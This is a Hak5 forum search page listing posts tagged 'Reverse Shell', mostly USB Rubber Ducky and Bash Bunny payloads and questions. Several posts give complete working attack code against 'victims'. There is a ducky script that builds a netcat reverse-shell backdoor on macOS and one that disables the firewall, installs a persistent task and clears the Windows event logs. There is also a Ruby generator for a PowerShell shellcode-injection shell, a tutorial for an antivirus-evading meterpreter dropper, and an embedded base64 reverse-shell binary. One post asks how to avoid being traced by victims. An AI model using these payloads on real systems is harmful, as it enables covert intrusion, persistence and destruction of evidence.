Jump to content

Search the Community

Showing results for tags 'Reverse Shell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 14 results

  1. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  2. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Single Blink) Installing connect.sh script Amber (Double Blink) Creating cron job White (Fast Blink) Cleaning up Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from MacPersistentReverseShell to either switch folder Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337 ?) Save the connect.sh file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat) If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh) Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) Once a bash shell prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download.
  3. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  4. Hi, I was wondering that when I create a reverse shell malware on a machine, wouldn’t I give away my IP address to the victim? Isn’t it pretty easy for victim to track me using my IP, assuming they are smart enough to find out my malware? Is it possible to get around this?
  5. asmTshell is a exploit pen test application I developed for users using linux such as debian ubuntu or kali OS. This tool allows you to build a reverse shell binary file and can be set to run on any OS be it windows linux or mac. Once the target windows/linux/mac system runs the shell binary they connect to your server giving you full control of the systems command prompt or shell from your server. It works by utilizing a linux asm compiler called "nasm" It takes target asm payload and allows you to customize the payload to your desired IP and port # through a easy GUI. Once configuration is done from GUI it will edit your input to the needed ASM hex strings using a custom python script. After which it will compile your new ASM into your target binary file. To get a server running you can use netcat nc or ncat ncat -lvkp 1344 ncat to accept more than one client connection to server nc -lvp 1344 netcat -lvp 1344 Once target system runs the shell binary they will connect to your server allowing you to control there OS from the shell. **Limitations** "keep in mind that your port or ip should not contain a 0, which could break it. If your IP contains a zero like 192.168.0.1 or your port contains a zero like 80, the build will not work" --Read-- can test using 127.1.1.1 as localhost server IP Download - https://www.dropbox.com/s/0cwhldcqjwvrgo3/asmshell.tar?dl=0 AV scan - https://www.virustotal.com/#/file/253d12fb5ddd6c58e02b5bbe0822012aef3624dae01a95927f148ba1da15a4c5/detection
  6. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handler configuration under msf msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.102 yes The listen address LPORT 45679 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target Then I exploit, nothing happens on the handler, no session receive, but the ssh terminal continuously showing the following message once I run the malware on the victim machine connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. connect_to localhost port 45679: failed. I did a scan on aaa.aaa.aaa.aaa:45679, no open port discovered. Since NC and apache test works, SSH tunnel should be functioning properly, so it is the handler's problem? My thought is, the multi handler is somehow not listening/connecting to the tunneled port, but I am not sure how could that happen, doesn't remote ssh tunnel automatically apply to global once the command is running? Any ideas, or workarounds? This should be a FAQ, yet, couldn't find right way... Thank you
  7. Hello Guys I need help with the a payload to get a reverse shell using the ruber ducky: I tried to use the powerducky script to get a reverse shell and no luck... I figured it out it was because my victim was an X64 and not a 386 ... So i went ahead and modified my powershell shell script to detect if my victim is X64... now when I run manually my malicious powershell script on my victim and i have a htpps listener in my attacking machine it works perfectly ... now the challenge i have is encoding my powershell script in base 64 so I can ultimately use in my inject.bin.... This is what I used to encode my powershell script: $Content = Get-Content -Path <path to my file> -Encoding Byte $Base64 = [system.Convert]::ToBase64String($Content) $Base64 | Out-File <path to encoded file> Also tried iconv in Linux: $Content = Get-Content -Path <path to my file> -Encoding Byte Encode="`cat $Content | iconv --to-code UTF-16LE | base64 -w 0`" and then dumping the value of variable encode... Whenever I tried to execute my payload in my victim (after loading the inject.bin in the ducky) the ducky starts to delivers the base 64 payload... however powershell truncates the payload while processing the base 64 string .. thus not getting a reverse shell.... After trying to run manually the powershell script... powershell -Enc <base64 string> i got the message in my victim that the string is not a valid base 64 string.... Anyone can point me on the command I need to run to convert my powershell script into a valid base 64 string so powershell can execute it? PS the reverse shell (reflective and web delivered) in powerducky have the same problem... whenever the inject.bin runs in the victim... the base 64 string is truncated in the victim and no reverse shell is sent to the attacking machine... Thanks
  8. Hey fellas i came across this reverse shell made by (James Cook @b00stfr3ak44) i was just curous how can i change this to a Persistence reverse shell , its currenty a .rb file. you execute it in terminal , but i would like to know how to change it. #!/usr/bin/env ruby # Thanks to @mattifestation exploit-monday.com and Dave Kennedy. # Written by James Cook @b00stfr3ak44 require 'base64' require 'readline' def print_error(text) print "\e[31m[-]\e[0m #{text}" end def print_success(text) print "\e[32m[+]\e[0m #{text}" end def print_info(text) print "\e[34m[*]\e[0m #{text}" end def get_input(text) print "\e[33m[!]\e[0m #{text}" end def rgets(prompt = '', default = '') choice = Readline.readline(prompt, false) choice == default if choice == '' choice end def select_host host_name = rgets('Enter the host ip to listen on: ') ip = host_name.split('.') if ip[0] == nil? || ip[1] == nil? || ip[2] == nil? || ip[3] == nil? print_error("Not a valid IP\n") select_host end print_success("Using #{host_name} as server\n") host_name end def select_port port = rgets('Port you would like to use or leave blank for [443]: ') if port == '' port = '443' print_success("Using #{port}\n") return port elsif !(1..65_535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) select_port else print_success("Using #{port}\n") return port end end def shellcode_gen(msf_path, host, port) print_info("Generating shellcode\n") msf_command = "#{msf_path}./msfvenom --payload " msf_command << "#{@set_payload} LHOST=#{host} LPORT=#{port} -f c" execute = `#{msf_command}` shellcode = clean_shellcode(execute) powershell_command = powershell_string(shellcode) final = to_ps_base64(powershell_command) final end def clean_shellcode(shellcode) shellcode = shellcode.gsub('\\', ',0') shellcode = shellcode.delete('+') shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..18] = '' shellcode end def to_ps_base64(command) Base64.encode64(command.split('').join("\x00") << "\x00").gsub!("\n", '') end def powershell_string(shellcode) s = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr ) s << 'VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, ' s << "uint flProtect);[DllImport(\"kernel32.dll\")]public static extern " s << 'IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, ' s << 'IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ' s << "IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern " s << "IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type " s << %(-memberDefinition $c -Name "Win32" -namespace Win32Functions ) s << "-passthru;[byte[]];[byte[]]$sc = #{shellcode};$size = 0x1000;if " s << '($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::' s << 'VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);' s << '$i++) {$w::memset([intPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::' s << "CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = " s << '[system.Convert]::ToBase64String([system.Text.Encoding]::Unicode.' s << 'GetBytes($1));if([intPtr]::Size -eq 8){$x86 = $env:SystemRoot + ' s << %("\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni ) s << %(-enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& ) s << %(powershell $cmd $gq";}) end def ducky_setup(encoded_command) print_info("Writing to file\n") s = "DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd\nENTER\nDELAY 500\n" s << "STRING powershell -nop -wind hidden -noni -enc #{encoded_command}\n" s << 'ENTER' File.open('powershell_reverse_ducky.txt', 'w') do |f| f.write(s) end print_success("File Complete\n") end def metasploit_setup(msf_path, host, port) print_info("Setting up Metasploit this may take a moment\n") rc_file = 'msf_listener.rc' file = File.open("#{rc_file}", 'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write('exploit -j') file.close system("#{msf_path}./msfconsole -r #{rc_file}") end begin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?('/opt/metasploit-framework/msfvenom') msf_path = ('/opt/metasploit-framework/') else print_error('Metasploit Not Found!') exit end @set_payload = 'windows/meterpreter/reverse_tcp' host = select_host port = select_port encoded_command = shellcode_gen(msf_path, host, port) ducky_setup(encoded_command) msf_setup = rgets('Would you like to start the listener?[yes/no] ') print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path, host, port) if msf_setup == 'yes' print_info("Good Bye!\n") end
  9. Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y
  10. Having used the duck to deploy the reverse shell which Darren originally posted on github, I am annoyed frequently that you are required to have a netcat listener up before the reverse shell is opened, and if you disconnect, you can't connect again without opening the reverse.exe file again and specifying the ip address etc. Shannon recently did her segment on a 20 second Mac hack, where she used code by Patrick Mosca. This code is designed so that even if netcat disconnects from the computer, you will still be able to reconnect again after 60 seconds. What I want to do is modify Darren's original code so that after 60 seconds or so, it checks if there is a connection or not, and if nothing is connected, it will rebroadcast to the host name or ip address waiting for netcat to catch the shell. I can't understand Darren's code (no offense Darren, I am new to the coding world :)) and I need to have this capability. Can someone please help me modify the code? Many Thanks, MB60893.
  11. Hi Everyone, I originally posted the "Reverse Shell - Wait for Connection" page and I still need help with it. If you could please refer to the original page and give me a hand with the VBScript, it would be much appreciated. :) Many Thanks, MB60893.
  12. First Post, here it goes I love the idea of the simple-ducky payload generator, I however do not love the idea of using powershell to download the dbd reverse shell from a webserver, its sloppy and unpredictable. Solution - Copy and launch DBD from twin duck flashed ducky! First you will need to create your dbd executable. Now navigate to /var/www/ on your linux box and rename winmgnt.txt to winmgnt.exe, copy this to the root of your ducky sd card. Now for the script I have included 2 scripts, one for a box with admin rights, the other for standard user rights. REM *** DBD no downloading with powershell - ADMIN Access *** REM *** CMD with UAC Bypass *** DELAY 10000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 REM *** Minimize CMD Windows *** ENTER ENTER ALT SPACE DELAY 300 STRING M DELAY 200 DOWNARROW REPEAT 100 ENTER ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d ENTER DELAY 500 REM *** Copy DBD from Duck to HDD and execute DBD *** STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe ENTER DELAY 600 STRING %WINDIR%\System32\winmgnt.exe ENTER DELAY 200 STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" ENTER REM *** Clear logs and exit CMD *** ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER DELAY 2000 ENTER ENTER STRING exit ENTER REM *** DBD no downloading with powershell - Standard User Access *** REM *** CMD *** DELAY 10000 WINDOWS r DELAY 200 STRING cmd.exe ENTER DELAY 3000 ALT y DELAY 500 REM *** Minimize CMD Windows *** ENTER ENTER ALT SPACE DELAY 300 STRING M DELAY 200 DOWNARROW REPEAT 100 ENTER ENTER DELAY 300 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d ENTER DELAY 500 REM *** Copy DBD from Duck to HDD and execute DBD *** STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe ENTER DELAY 600 STRING %WINDIR%\System32\winmgnt.exe ENTER DELAY 200 STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" ENTER REM *** Clear logs and exit CMD *** ENTER STRING for /f %x in ('wevtutil el') do wevtutil cl "%x" ENTER DELAY 2000 ENTER ENTER STRING exit ENTER Hope you enjoy these scripts, if anything is wrong with them please let me know so i can fix them locally. NOTE - The Volume label of the sd card should be "DBD" to work with the script, but if you know what your doing change that to whatever you want.
  13. As requested, I made a modification to my root backdoor for OSX. This script will open a terminal from Spotlight and install a persistent reverse shell that will call home every 60 seconds. This will give you a user level shell for when you are unable or it is impossible to boot into single user mode. Change the domain/IP address to yours and catch with netcat: 'nc -l -p 1337' or 'nc -l 1337' on Macs. GUI - user payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-User-Backdoor Single user mode - root payload: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor Tutorial: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
  14. I'm trying to run the Windows Reverse Shell Payload on a 64 bit system, and I get the error: "C:\reverse.exe is not a valid Win32 application." Is there something wrong with the payload itself? Or does it not run on 64-bit systems? Script below. Any help would be greatly appreciated! DELAY 1000 ESCAPE ESCAPE DELAY 400 WINDOWS R DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 192.168.1.47 8080 ENTER STRING pause ENTER
×
×
  • Create New...